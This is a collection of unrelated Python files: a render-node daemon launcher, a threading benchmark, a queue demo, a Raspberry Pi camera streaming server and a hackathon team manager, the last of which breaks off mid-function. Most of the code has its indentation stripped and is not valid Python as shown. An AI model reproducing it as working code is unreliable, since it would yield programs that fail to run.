multi_nodes.py
#!/usr/bin/env python
import os
import sys
import time
import logging
from multiprocessing import Process, current_process
from plow.rndaemon.main import RndFormatter
from plow.rndaemon import conf
class RndProcessHandler(object):
def runTask(self, rtc):
logger = logging.getLogger(__name__)
logger.info("Server asked node to run a task: %r", rtc)
def killRunningTask(self, procId, reason):
logger = logging.getLogger(__name__)
logger.info("Server asked node to kill a task on proc %r", procId)
def getRunningTasks(self):
logger = logging.getLogger(__name__)
logger.info("Server asked node to report running tasks")
return []
def reboot(self, now=False):
logger = logging.getLogger(__name__)
logger.info("Server asked node to reboot (now = %r)", now)
def start(port):
from plow.rndaemon import profile
from plow.rndaemon.profile import test
profile.SystemProfiler = test.SystemProfiler
from plow.rndaemon.server import get_server
from plow.rndaemon.rpc import RndNodeApi
logger = logging.getLogger(current_process().name)
logger.info("Staring Render Node Daemon on TCP port %d", port)
server = get_server(RndNodeApi, RndProcessHandler(), port)
try:
server.serve()
except KeyboardInterrupt:
sys.exit(2)
if __name__ == "__main__":
logger = logging.getLogger()
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = RndFormatter(datefmt='%Y-%m-%d %H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
logger.setLevel(logging.DEBUG)
import argparse
parser = argparse.ArgumentParser(
description='Start the Plow Render Node Daemon',
usage='%(prog)s [opts]',
)
parser.add_argument("-num", type=int, default=1,
help="Number of rndaemon instances to start")
parser.add_argument("-refresh", type=int, default=30,
help="How often, in seconds, to ping in updated data for each node")
args = parser.parse_args()
daemons = []
num = max(args.num, 1)
conf.NETWORK_PING_INTERVAL = max(args.refresh, 1)
logger.info("Starting %d rndaemon processes...", num)
for i in xrange(num):
name = 'rndaemon-instance-{0}'.format(i)
p = Process(target=start, args=(conf.NETWORK_PORT + i,), name=name)
p.daemon = True
p.start()
daemons.append(p)
while True:
try:
time.sleep(.5)
except KeyboardInterrupt:
for d in daemons:
d.terminate()
d.join()
break
sys.exit(0)
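
The script above fans out one daemon Process per rndaemon instance and tears them all down on Ctrl-C. Below is a minimal, standard-library-only sketch of that spawn/terminate pattern; the serve() body and the port numbers are placeholders, not the plow API.

# Hedged sketch of the spawn/terminate loop used above (stdlib only, no plow).
import time
from multiprocessing import Process, current_process

def serve(port):
    # Placeholder for start(): pretend to serve on `port` until terminated.
    print("%s serving on port %d" % (current_process().name, port))
    while True:
        time.sleep(0.5)

if __name__ == "__main__":
    workers = [Process(target=serve, args=(11300 + i,), name="worker-%d" % i, daemon=True)
               for i in range(3)]
    for w in workers:
        w.start()
    try:
        while True:
            time.sleep(0.5)
    except KeyboardInterrupt:
        for w in workers:
            w.terminate()
            w.join()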
benchmark02_int_arithmetic.py
#!/usr/bin/python
import os
import sys
import threading
import time
from multiprocessing import Pool
sys.path.append("./benchmark_cython_module")
import benchmark_cython_module
NUM_ITERATIONS = 1000000
NUM_TASKS = 50
def my_function1(in_value, out_value):
out_value[in_value] = sum([(((z * z) + (z * z * 9)) / 5) + in_value
for z in xrange(NUM_ITERATIONS)])
def my_function2(in_value):
return sum([(((z * z) + (z * z * 9)) / 5) + in_value
for z in xrange(NUM_ITERATIONS)])
if __name__ == '__main__':
print ("Running: %s" % os.path.basename(__file__))
results = {}
jobs = [threading.Thread(target=my_function1, kwargs=dict(in_value=i, out_value=results))
for i in xrange(NUM_TASKS)]
start_time = time.time()
[t.start() for t in jobs]
[t.join() for t in jobs]
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(using threading): %f\n" % execution_time)
# print ("Results: %s\n" % results.values())
pool = Pool(processes=4)
start_time = time.time()
results = [pool.apply_async(my_function2, [p]) for p in xrange(NUM_TASKS)]
pool.close()
pool.join()
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(using multiprocessing.Pool): %f\n" % execution_time)
# print ("Results: %s\n" % [x.get() for x in results])
results = {}
jobs = [threading.Thread(target=benchmark_cython_module.benchmark02_function1,
kwargs=dict(in_value=i, out_value=results, num_iters=NUM_ITERATIONS))
for i in xrange(NUM_TASKS)]
start_time = time.time()
[t.start() for t in jobs]
[t.join() for t in jobs]
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(using threading and cython module): %f\n" % execution_time)
# print ("Results: %s\n" % results.values())
pool = Pool(processes=4)
start_time = time.time()
results = [pool.apply_async(benchmark_cython_module.benchmark02_function2, [p, NUM_ITERATIONS])
for p in xrange(NUM_TASKS)]
pool.close()
pool.join()
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(using multiprocessing.Pool and cython module): %f\n" % execution_time)
# print ("Results: %s\n" % [x.get() for x in results])
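
Because the loops above are pure-Python and CPU-bound, the threaded runs are expected to be GIL-limited while the Pool runs scale with worker processes. A minimal sketch of the same timing comparison without the cython module (the arithmetic is a simplified stand-in):

# Hedged sketch: time the same CPU-bound function under threads vs. a process pool.
import time
from threading import Thread
from multiprocessing import Pool

def work(n, iters=200000):
    return sum((z * z * 10) // 5 + n for z in range(iters))

if __name__ == "__main__":
    t0 = time.time()
    threads = [Thread(target=work, args=(i,)) for i in range(8)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print("threads: %.3fs" % (time.time() - t0))

    t0 = time.time()
    with Pool(processes=4) as pool:
        pool.map(work, range(8))
    print("pool:    %.3fs" % (time.time() - t0))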
6-queued-threads.py
from threading import Thread
import time
import random
import queue
counter = 0
job_queue = queue.Queue()
counter_queue = queue.Queue()
def increment_manager():
global counter
while True:
        increment = counter_queue.get()  # blocks until an item is available
time.sleep(random.random())
old_counter = counter
time.sleep(random.random())
counter = old_counter + increment
time.sleep(random.random())
job_queue.put((f'New counter value {counter}', '------------'))
time.sleep(random.random())
        counter_queue.task_done()  # mark the item as processed so counter_queue.join() can return
# printer_manager and increment_manager run continuously because of the `daemon` flag.
Thread(target=increment_manager, daemon=True).start()
def printer_manager():
while True:
for line in job_queue.get():
time.sleep(random.random())
print(line)
job_queue.task_done()
# printer_manager and increment_manager run continuously because of the `daemon` flag.
Thread(target=printer_manager, daemon=True).start()
def increment_counter():
counter_queue.put(1)
time.sleep(random.random())
worker_threads = [Thread(target=increment_counter) for thread in range(10)]
for thread in worker_threads:
time.sleep(random.random())
thread.start()
for thread in worker_threads:
thread.join() # wait for it to finish
counter_queue.join() # wait for counter_queue to be empty
job_queue.join() # wait for job_queue to be empty
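
The script relies on the Queue contract: every get() is paired with a task_done(), and join() blocks until every queued item has been marked done. A minimal sketch of just that contract:

# Hedged sketch of the task_done()/join() bookkeeping the script above depends on.
import queue
from threading import Thread

q = queue.Queue()

def worker():
    while True:
        item = q.get()       # blocks until an item is available
        print("processed", item)
        q.task_done()        # tells q.join() this item is finished

Thread(target=worker, daemon=True).start()
for i in range(5):
    q.put(i)
q.join()                     # returns only after all 5 items are task_done()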
server.py
#!/usr/bin/env python
import sys
import io
import os
import shutil
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server
import picamera
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import (
WSGIServer,
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
)
from ws4py.server.wsgiutils import WebSocketWSGIApplication
###########################################
# CONFIGURATION
WIDTH = 640
HEIGHT = 480
FRAMERATE = 24
HTTP_PORT = 8082
WS_PORT = 8084
COLOR = u'#444'
BGCOLOR = u'#333'
JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')
VFLIP = False
HFLIP = False
###########################################
class StreamingHttpHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.do_GET()
def do_GET(self):
if self.path == '/':
self.send_response(301)
self.send_header('Location', '/index.html')
self.end_headers()
return
elif self.path == '/jsmpeg.min.js':
content_type = 'application/javascript'
content = self.server.jsmpeg_content
elif self.path == '/index.html':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.index_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
else:
self.send_error(404, 'File not found')
return
content = content.encode('utf-8')
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Content-Length', len(content))
self.send_header('Last-Modified', self.date_time_string(time()))
self.end_headers()
if self.command == 'GET':
self.wfile.write(content)
class StreamingHttpServer(HTTPServer):
def __init__(self):
super(StreamingHttpServer, self).__init__(
('', HTTP_PORT), StreamingHttpHandler)
with io.open('index.html', 'r') as f:
self.index_template = f.read()
with io.open('jsmpeg.min.js', 'r') as f:
self.jsmpeg_content = f.read()
class StreamingWebSocket(WebSocket):
def opened(self):
self.send(JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT), binary=True)
class BroadcastOutput(object):
def __init__(self, camera):
print('Spawning background conversion process')
self.converter = Popen([
'ffmpeg',
'-f', 'rawvideo',
'-pix_fmt', 'yuv420p',
'-s', '%dx%d' % camera.resolution,
'-r', str(float(camera.framerate)),
'-i', '-',
'-f', 'mpegts',
'-b', '800k',
'-codec:v', 'mpeg1video',
'-'],
stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
shell=False, close_fds=True)
def write(self, b):
self.converter.stdin.write(b)
def flush(self):
print('Waiting for background conversion process to exit')
self.converter.stdin.close()
self.converter.wait()
class BroadcastThread(Thread):
def __init__(self, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.converter = converter
self.websocket_server = websocket_server
def run(self):
try:
while True:
buf = self.converter.stdout.read1(32768)
if buf:
self.websocket_server.manager.broadcast(buf, binary=True)
elif self.converter.poll() is not None:
break
finally:
self.converter.stdout.close()
def main():
print('Initializing camera')
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
sleep(1) # camera warm-up time
print('Initializing websockets server on port %d' % WS_PORT)
WebSocketWSGIHandler.http_version = '1.1'
websocket_server = make_server(
'', WS_PORT,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(
protocols=['null'],
handler_cls=StreamingWebSocket))
websocket_server.initialize_websockets_manager()
websocket_thread = Thread(target=websocket_server.serve_forever)
print('Initializing HTTP server on port %d' % HTTP_PORT)
http_server = StreamingHttpServer()
http_thread = Thread(target=http_server.serve_forever)
print('Initializing broadcast thread')
output = BroadcastOutput(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
print('Starting websockets thread')
websocket_thread.start()
print('Starting HTTP server thread')
http_thread.start()
print('Starting broadcast thread')
broadcast_thread.start()
while True:
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
print('Shutting down HTTP server')
http_server.shutdown()
print('Shutting down websockets server')
websocket_server.shutdown()
print('Waiting for HTTP server thread to finish')
http_thread.join()
print('Waiting for websockets thread to finish')
websocket_thread.join()
if __name__ == '__main__':
main()
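
StreamingWebSocket.opened() sends a fixed 8-byte header so the jsmpeg client knows the stream dimensions. A small sketch of how that struct layout packs and unpacks (stdlib only; the values are the defaults from the configuration above):

# Hedged sketch of the jsmpeg header built in StreamingWebSocket.opened():
# a big-endian 4-byte magic followed by two unsigned 16-bit ints (width, height).
from struct import Struct

JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')

header = JSMPEG_HEADER.pack(JSMPEG_MAGIC, 640, 480)
magic, width, height = JSMPEG_HEADER.unpack(header)
assert (magic, width, height) == (JSMPEG_MAGIC, 640, 480)
print(len(header), magic, width, height)   # 8 b'jsmp' 640 480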
team_manager.py
# -*- coding: utf-8 -*-
"""
This file is covered by the LICENSING file in the root of this project.
"""
import sys
from werkzeug.exceptions import Forbidden
sys.path.append("..")
import uuid
import time
from flask import g
import threading
from mongoengine import Q, ValidationError
from os.path import realpath, abspath, dirname
from hackathon import Component, RequiredFeature
from hackathon.hmongo.models import Team, TeamMember, TeamScore, TeamWork, Hackathon, UserHackathon, Azure, to_dic
from hackathon.hackathon_response import not_found, bad_request, precondition_failed, ok, forbidden
from hackathon.constants import TEAM_MEMBER_STATUS, TEAM_SHOW_TYPE, HACK_USER_TYPE, HACKATHON_CONFIG
__all__ = ["TeamManager"]
hack_manager = RequiredFeature("hackathon_manager")
class TeamManager(Component):
"""Component to manage hackathon teams"""
user_manager = RequiredFeature("user_manager")
admin_manager = RequiredFeature("admin_manager")
register_manager = RequiredFeature("register_manager")
hackathon_template_manager = RequiredFeature("hackathon_template_manager")
def get_team_by_id(self, team_id):
team = self.__get_team_by_id(team_id)
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
if team:
# TODO: refine: dereference member users is not necessary
return self.__team_detail(team, user)
else:
return not_found()
def get_my_current_team(self, hackathon, user):
team = self.__get_valid_team_by_user(user.id, hackathon.id)
        return self.__team_detail(team, user) if team else not_found(
            "user has no team", friendly_message="Team formation error, please contact the administrator!")
def get_team_by_name(self, hackathon_id, team_name):
""" get user's team basic information stored on table 'team' based on team name
:type hackathon_id: int
:param hackathon_id: id of hackathon related to the team
:type team_name: str | unicode
:param team_name: name of the team
:rtype: dict
:return: team's information as a dict if team is found otherwise not_found()
"""
team = self.__get_team_by_name(hackathon_id, team_name)
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
if team:
return self.__team_detail(team, user)
else:
return not_found("no such team")
def get_team_members(self, team_id):
"""Get team member list of specific team
:rtype: dict
:return: team's information and team's members list if team is found otherwise not_found()
"""
try:
team = Team.objects(id=team_id).first()
except ValidationError:
return None
if not team:
return None
def sub(t):
m = to_dic(t)
m["user"] = self.user_manager.user_display_info(t.user)
return m
return [sub(t) for t in team.members]
def get_hackathon_team_list(self, hackathon_id, name=None, number=None):
"""Get the team list of selected hackathon
:type hackathon_id: string or object_id
:param hackathon_id: hackathon id
:type name: str|unicode
:param name: name of team. optional
:type number: int
:param number: querying condition, return number of teams
:rtype: list
:return: a list of team filter by name and number on selected hackathon
"""
query = Q(hackathon=hackathon_id)
if name is not None:
query &= Q(name__icontains=name)
try:
teams = Team.objects(query).order_by('name')[:number]
except ValidationError:
return []
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
def get_team(team):
teamDic = team.dic()
teamDic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
teamDic['cover'] = teamDic.get('cover', '')
teamDic['project_name'] = teamDic.get('project_name', '')
teamDic['dev_plan'] = teamDic.get('dev_plan', '')
teamDic['works'] = teamDic.get('works', '')
[teamDic.pop(key, None) for key in
['assets', 'azure_keys', 'scores', 'templates', 'hackathon']]
teamDic["member_count"] = team.members.filter(status=TEAM_MEMBER_STATUS.APPROVED).count()
def sub(t):
m = to_dic(t)
m["user"] = self.user_manager.user_display_info(t.user)
return m
teamDic["members"] = [sub(t) for t in team.members]
return teamDic
return [get_team(x) for x in teams]
def create_default_team(self, hackathon, user):
"""Create a default new team for user after registration.
Use user name as team name by default. Append user id in case user name is duplicate
"""
user_team = self.__get_valid_team_by_user(user.id, hackathon.id)
if user_team:
self.log.debug("fail to create team since user is already in some team.")
return precondition_failed("you must leave the current team first")
team_name = self.__generate_team_name(hackathon, user)
team_member = TeamMember(join_time=self.util.get_now(),
status=TEAM_MEMBER_STATUS.APPROVED,
user=user)
team = Team(name=team_name,
leader=user,
logo=user.avatar_url,
hackathon=hackathon,
members=[team_member])
team.save()
return team.dic()
def update_team(self, kwargs):
"""Update existing team information
:type kwargs: dict
:param kwargs: a dict to store update information for team
:rtype: dict
:return: updated team information in a dict
"""
team = self.__get_team_by_id(kwargs["id"])
if not team:
return not_found("team not exists")
# avoid duplicate team with same names
if "name" in kwargs and kwargs["name"] != team.name:
if self.__get_team_by_name(g.hackathon.id, kwargs["name"]):
return precondition_failed("team with the same name exists already")
self.__validate_team_permission(g.hackathon.id, team, g.user)
# hackathon.modify(**update_items)
# team.name = kwargs.get("name", team.name)
# team.description = kwargs.get("description", team.description)
# team.logo = kwargs.get("logo", team.logo)
kwargs.pop('id', None) # id should not be included
team.modify(**kwargs)
team.update_time = self.util.get_now()
team.save()
if "dev_plan" in kwargs and kwargs["dev_plan"] and not kwargs["dev_plan"] == "" \
and team.hackathon.config.get(HACKATHON_CONFIG.DEV_PLAN_REQUIRED, False):
t = threading.Thread(target=self.__email_notify_dev_plan_submitted, args=(team,))
t.setDaemon(True)
t.start()
return self.__team_detail(team)
def dismiss_team(self, operator, team_id):
"""Dismiss a team by team leader or hackathon admin
:rtype: bool
        :return: ok() if the dismissal succeeds; otherwise, bad request.
"""
team = self.__get_team_by_id(team_id)
if not team:
return ok()
hackathon = team.hackathon
self.__validate_team_permission(hackathon.id, team, operator)
members = team.members
member_users = [m.user for m in members]
        # TODO: transaction?
team.delete()
for u in member_users:
self.create_default_team(hackathon, u)
return ok()
def quit_team_forcedly(self, team, user):
"""
        The operator (admin or superadmin) forces a user (team leader or another member) to quit a team.
        If the user is the only member of the team, the team will be deleted.
        If the user is the leader of a team with several members, the team will be decomposed into several
        new teams.
        If the user is not the leader of a team with several members, only that user quits the team.
        :rtype: bool
        :return: ok() if the operation succeeds; otherwise, bad request.
"""
# here we don't check whether the operator has the permission,
if not team.members or len(team.members) == 0:
self.log.warn("this team doesn't have any members")
return ok()
member_users = [m.user for m in team.members if m.status == TEAM_MEMBER_STATUS.APPROVED]
num_team_members = len(member_users)
hackathon = team.hackathon
if num_team_members > 1:
if team.leader == user:
team.delete()
for u in member_users:
if u.id != user.id:
self.create_default_team(hackathon, u)
else:
Team.objects(id=team.id).update_one(pull__members__user=user)
else:
# num_team_members == 1
team.delete()
return ok()
def join_team(self, user, team_id):
"""Join a team will create a record on user_team_rel table which status will be 0.
:type user: User
:rtype: dict
        :return: if the user has already joined a team or the team does not exist, return bad request.
        Else, return a dict of the join details.
"""
if Team.objects(id=team_id, members__user=user.id).count():
return ok("You already joined this team.")
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
cur_team = self.__get_valid_team_by_user(user.id, team.hackathon.id)
if cur_team and cur_team.members.count() > 1:
return precondition_failed("Team leader cannot join another team for team member count greater than 1")
if not self.register_manager.is_user_registered(user.id, team.hackathon):
return precondition_failed("user not registerd")
mem = TeamMember(
join_time=self.util.get_now(),
status=TEAM_MEMBER_STATUS.INIT,
user=user)
team.members.append(mem)
team.save()
return to_dic(mem)
def update_team_member_status(self, operator, team_id, user_id, status):
""" update user's status on selected team. if current user doesn't have permission, return bad request.
Else, update user's status
:type status: int
:param status: the status of the team member, see TEAM_MEMBER_STATUS in constants.py
:rtype: bool
        :return: ok() if the update succeeds; otherwise, bad request.
"""
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
mem = [x for x in team.members if str(x.user.id) == user_id]
assert len(mem) < 2
if not mem:
return not_found()
mem = mem[0]
# #NOTE1# we have to re-check this here
# because of this situation:
# A is in a single-person team TeamA, and request join TeamB
# after that, C join TeamA and now TeamA has two members,
# this is not allowed when status == TEAM_MEMBER_STATUS.APPROVED
cur_team = self.__get_valid_team_by_user(mem.user.id, team.hackathon.id)
if cur_team and cur_team.members.count() > 1:
return precondition_failed("Team leader cannot join another team for team member count greater than 1")
self.__validate_team_permission(team.hackathon.id, team, operator)
if mem.user.id == team.leader.id:
return precondition_failed("cannot update status of team leader")
if status == TEAM_MEMBER_STATUS.APPROVED:
# disable previous team first
# NOTE:
# Do we also have to delete status that is not TEAM_MEMBER_STATUS.APPROVED?
# i.e., if A request join both TeamB and TeamC, TeamC approve join first, then TeamB approved,
# this will cause A leave TeamB and join TeamC.
# is this the desired behaviour?
Team.objects(hackathon=team.hackathon.id).update(__raw__={
"$pull": {
"members": {
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}}})
# because only team leader with single team can make join request
# so we don't have to make default team for other members in this team
# we make the check in #NOTE1# so this is always true
Team.objects(hackathon=team.hackathon.id, leader=mem.user.id).delete()
mem.status = TEAM_MEMBER_STATUS.APPROVED
mem.update_time = self.util.get_now()
team.save()
return ok("approved")
if status == TEAM_MEMBER_STATUS.DENIED:
user = mem.user
hackathon = team.hackathon
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
return ok("Your request has been denied, please rejoin another team.")
def kick_or_leave(self, operator, team_id, user_id):
try:
team = Team.objects(id=team_id, members__user=user_id).first()
except ValidationError:
return not_found()
if not team:
return not_found()
mem = [x for x in team.members if str(x.user.id) == user_id]
assert len(mem) < 2
if not mem:
return not_found()
mem = mem[0]
hackathon = team.hackathon
user = mem.user
if str(team.leader.id) == user_id: # if the user to be leaved or kicked is team leader
return precondition_failed("leader cannot leave team")
if str(operator.id) == user_id: # leave team
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
else: # kick somebody else
self.__validate_team_permission(hackathon.id, team, operator)
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
return ok()
def add_template_for_team(self, args):
"""Add template to team of the current user by template name
        template_id must be included in args. The current login user must have a team and must be its leader
"""
if "template_id" not in args:
return bad_request("template id invalid")
team = self.__get_valid_team_by_user(g.user.id, g.hackathon.id)
if not team:
return precondition_failed("you don't join any team so you cannot add teamplate")
if team.leader.id != g.user.id:
return forbidden("team leader required")
else:
return self.hackathon_template_manager.add_template_to_hackathon(args["template_id"])
def delete_template_from_team(self, template_id):
"""Delete template from current user's team
Team should exist and current login user must be the leader
"""
team = self.__get_valid_team_by_user(g.user.id, g.hackathon.id)
if not team:
return precondition_failed("you don't join any team so you cannot add teamplate")
if team.leader.id != g.user.id:
return forbidden("team leader required")
else:
return self.hackathon_template_manager.delete_template_from_hackathon(template_id)
def get_team_by_user_and_hackathon(self, user, hackathon):
team = Team.objects(hackathon=hackathon, members__user=user).first()
return team
def score_team(self, judge, ctx):
team = self.__get_team_by_id(ctx.team_id)
if not team:
return not_found("team not found")
if not self.admin_manager.is_hackathon_admin(team.hackathon.id, judge.id):
return forbidden()
score = [x for x in team.scores if x.judge.id == judge.id]
assert len(score) < 2
if score:
score = score[0]
score.score = ctx.score
score.reason = ctx.get("reason")
score.update_time = self.util.get_now()
else:
score = TeamScore(
score=ctx.score,
judge=judge,
reason=ctx.get("reason"))
team.scores.append(score)
team.save()
return self.__response_get_score(judge, team.scores)
def get_score(self, user, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return not_found("team not found")
if not self.admin_manager.is_hackathon_admin(team.hackathon.id, user.id):
return {}
return self.__response_get_score(user, team.scores)
def __response_get_score(self, user, scores):
resp = {
"all": [to_dic(s) for s in scores]}
my = [sc for sc in scores if sc.judge.id == user.id]
assert len(my) < 2
if my:
resp["my"] = to_dic(my[0])
return resp
def add_team_show(self, user, context):
team = self.__get_team_by_id(context.team_id)
if not team:
return not_found()
self.__validate_team_permission(team.hackathon.id, team, user)
try:
work = TeamWork(
id=uuid.uuid1(),
description=context.get("note"),
type=context.type,
uri=context.uri)
team.works.append(work)
team.save()
except ValidationError as e:
if "uri" in e.message:
return bad_request("`uri` field must be in uri format")
else:
raise e
return to_dic(work)
def delete_team_show(self, user, show_id):
try:
team = Team.objects(works__id=show_id).first()
except (ValidationError, ValueError):
return not_found("wrong id format")
if team:
self.__validate_team_permission(team.hackathon.id, team, user)
for i in range(len(team.works)):
if str(team.works[i].id) == show_id:
team.works.pop(i)
team.save()
break
return ok()
def get_team_show_list(self, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return []
return [to_dic(s) for s in team.works]
def get_hackathon_show_list(self, hackathon_id, show_type=None, limit=6):
query = Q(hackathon=hackathon_id)
if show_type is not None:
query &= Q(works__type=int(show_type))
works = []
for team in Team.objects(query).filter(works__1__exists=True).order_by('update_time', '-age')[:limit]:
teamDic = team.dic()
teamDic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
teamDic['cover'] = teamDic.get('cover', '')
teamDic['project_name'] = teamDic.get('project_name', '')
teamDic['dev_plan'] = teamDic.get('dev_plan', '')
[teamDic.pop(key, None) for key in ['assets', 'awards', 'azure_keys', 'scores', 'templates', 'members']]
#
# teamDic['works'] = []
#
# for work in team.works:
# teamDic['works'].append(to_dic(work))
works.append(teamDic)
# works.sort(lambda a, b: int(b["create_time"] - a["create_time"]))
# def proc_work(w):
# w.pop("create_time")
# w["id"] = str(w["id"])
# w["team_id"] = str(w["team_id"])
# w["hackathon_id"] = str(w["hackathon_id"])
# return w
return works
def get_team_show_list_by_user(self, user_id):
teams = Team.objects(members__match={
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}).all()
def get_team_show_detail(team):
dic = self.__team_detail(team)
dic["hackathon"] = team.hackathon.dic()
return dic
return [get_team_show_detail(team) for team in teams if not len(team.works) == 0]
def get_team_source_code(self, team_id):
try:
team = Team.objects(id=team_id, works__type=TEAM_SHOW_TYPE.SOURCE_CODE)
except ValidationError:
return None
if not team:
return None
return [w for w in team.works if w.type == TEAM_SHOW_TYPE.SOURCE_CODE][0]
def query_team_awards(self, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return []
awards = [self.__award_with_detail(r, hackathon=team.hackathon) for r in team.awards]
awards.sort(lambda a, b: b.level - a.level)
return awards
def get_granted_awards(self, hackathon):
awards = []
team_id_with_awards = []
for team in Team.objects(hackathon=hackathon):
awards += team.awards
if not len(team.awards) == 0:
team_id_with_awards.append(team.id)
awards = [self.__award_with_detail(r) for r in awards]
awards.sort(lambda a, b: b["level"] - a["level"])
# find teams who are granted these awards
for award in awards:
award["team"] = []
for team_id in team_id_with_awards:
team = Team.objects(id=team_id).first()
if uuid.UUID(award["id"]) in team.awards:
award["team"].append(team.dic())
# len(awards) is equal to the number of all awards granted, so it's duplicated, remove duplicated items in JS.
return awards
def get_all_granted_awards(self, limit):
teams = Team.objects().all()
teams_with_awards = [team for team in teams if not team.awards == []]
teams_with_awards.sort(key=lambda t: (
t.hackathon.id,
Hackathon.objects(id=t.hackathon.id, awards__id=t.awards[0]).first().awards.get(id=t.awards[0]).level
), reverse=True) # sort by hackathon and then sort by award level.
teams_with_awards = teams_with_awards[0: int(limit)]
return [self.__get_hackathon_and_show_detail(team) for team in teams_with_awards]
def grant_award_to_team(self, hackathon, context):
team = self.__get_team_by_id(context.team_id)
if not team:
return not_found("team not found")
award = [a for a in hackathon.awards if str(a.id) == context.award_id]
assert len(award) < 2
if not award:
return not_found("award not found")
award = award[0]
if team.hackathon.id != hackathon.id:
return precondition_failed("hackathon doesn't match")
team_award = [a for a in team.awards if str(a) == context.award_id]
assert len(team_award) < 2
if not team_award:
team.awards.append(uuid.UUID(context.award_id))
team.save()
return self.__award_with_detail(context.award_id)
def cancel_team_award(self, hackathon, team_id, award_id):
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
for award in team.awards:
if str(award) == award_id:
team.awards.remove(award)
team.save()
break
return ok()
def send_email_azure(self, kwargs):
# team information
team = self.__get_team_by_id(kwargs["id"])
if not team:
return not_found("team not exists")
azure = team.azure
if not azure.strip():
if Azure.objects(status="0").count() == 0:
return ok("请联系管理员.")
azure_info = Azure.objects(status="0").first()
else:
azure_info = Azure.objects(account=azure).first()
if not azure_info:
return ok("请联系管理员!")
primary_emails = []
for i in range(0, len(team.members)):
mem = team.members[i]
resp = self.user_manager.user_display_info(mem.user)
primary_emails.append(resp['emails'][0]['email'])
Azure.objects(account=azure_info.account).update_one(status="1")
Team.objects(id=team.id).update_one(azure=azure_info.account)
sender = ''
email_title = ''
email_content = ''
return self.util.send_emails(sender, primary_emails, email_title, email_content)
def __init__(self):
pass
def __award_with_detail(self, team_award, hackathon=None):
if not hackathon:
hackathon = g.hackathon
try:
award = [a for a in hackathon.awards if str(a.id) == str(team_award)][0]
except IndexError:
return None
return to_dic(award)
def __team_detail(self, team, user=None):
resp = team.dic()
resp["leader"] = self.user_manager.user_display_info(team.leader)
resp["member_count"] = team.members.filter(status=TEAM_MEMBER_STATUS.APPROVED).count()
# all team action not allowed if frozen
resp["is_frozen"] = False
for i in range(0, len(team.members)):
mem = team.members[i]
resp["members"][i]["user"] = self.user_manager.user_display_info(mem.user)
if user:
resp["is_admin"] = self.admin_manager.is_hackathon_admin(team.hackathon.id, user.id)
resp["is_leader"] = team.leader == user
rel = team.members.filter(user=user)
resp["is_member"] = True if not rel == [] else False
return resp
def __generate_team_name(self, hackathon, user):
"""Generate a default team name by user name. It can be updated later by team leader"""
team_name = user.name
if Team.objects(hackathon=hackathon, name=team_name).first():
team_name = "%s (%s)" % (user.name, user.id)
return team_name
def __get_user_teams(self, user_id):
"""Get all teams of specific and related hackathon display info
:type user_id: int
:param user_id: User id to get teams. Cannot be None
:rtype: list
:return list of all teams as well as hackathon info
"""
return Team.objects(members__user=user_id).all()
def __get_team_by_id(self, team_id):
"""Get team by its primary key"""
try:
return Team.objects(id=team_id).first()
except ValidationError:
return None
def __get_valid_team_by_user(self, user_id, hackathon_id):
"""Get valid Team(Mongo-document) by user and hackathon
"valid" means user is approved. There might be other records where status=Init
Since foreign keys are defined in Team, one can access team or user through the return result directly
:rtype: Team
:return instance of Team
"""
return Team.objects(
hackathon=hackathon_id,
members__match={
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}).first()
def __get_team_by_name(self, hackathon_id, team_name):
""" get user's team basic information stored on table 'team' based on team name
:type hackathon_id: int
:param hackathon_id: hackathon id for the team
:type team_name: str|unicode
:param team_name: name of the team
:rtype: Team
:return: instance of Team if team found otherwise None
"""
try:
